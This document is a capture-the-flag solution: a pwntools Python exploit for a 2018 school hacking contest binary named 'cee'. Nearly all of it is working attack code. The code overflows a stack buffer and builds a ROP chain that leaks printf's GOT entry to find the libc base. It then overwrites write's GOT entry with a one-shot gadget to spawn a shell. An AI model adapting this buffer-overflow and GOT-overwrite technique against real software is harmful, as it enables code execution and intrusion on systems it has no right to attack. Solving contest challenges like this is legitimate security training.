hOwDayS Sunrin 10720
Sunrin Internet High School In-School Hacking Defense Contest 2018 cee
```python
from pwn import *

# Addresses taken from the cee binary
pop_RSI_R15 = 0x0000000000400a51  # gadget: pop rsi; pop r15; ret
main_read = 0x40099E
main = 0x400716
# Offset of the one-shot gadget inside libc
oneshot = 0x45216

p = process("./cee")
e = ELF("./cee")


def SETTING():
    # Answer the prompts that come before the vulnerable read
    p.recv()
    p.sendline(b"2018-11-15")

    ## KOREAN ##
    p.recv()
    p.sendline(b"-1")

    ## ENGLISH ##
    p.recv()
    p.sendline(b"-1")

    ## MATH ##
    p.recv()
    p.sendline(b"-1")


## EXPLOIT ##
SETTING()

# STAGE 1 : Leak : libc_base #
# RSI = buf
# RDI = fd
p.recv()
payload1 = b"A" * 0x30               # fill the buffer
payload1 += b"A" * 8                 # saved RBP
payload1 += p64(pop_RSI_R15)
payload1 += p64(e.got['printf'])     # RSI = GOT entry of printf
payload1 += p64(1)                   # R15 (value popped by the gadget)
payload1 += p64(e.plt['write'])      # write out the GOT entry
payload1 += p64(main)                # return to main for the second stage
p.send(payload1)

p.recvuntil(b"Thank You!!")
# Leaked printf address minus 0x55800 gives the libc base
libc_base = u64(p.recv(8)) - 0x55800
p.success("Leak libc_base : " + hex(libc_base))
p.success("oneshot Address : " + hex(libc_base + oneshot))

SETTING()

# STAGE 2 : overwrite write to oneshot #
# RSI = buf
# RDI = fd ( using main )
payload2 = b"A" * 0x30
payload2 += b"A" * 8
payload2 += p64(pop_RSI_R15)
payload2 += p64(e.got['write'])      # RSI = GOT entry of write
payload2 += p64(0)                   # R15 (value popped by the gadget)
payload2 += p64(main_read)           # jump to main_read so the read targets RSI
p.send(payload2)

# Data for that read: the GOT entry of write now points at the one-shot gadget
p.send(p64(libc_base + oneshot))

p.interactive()
```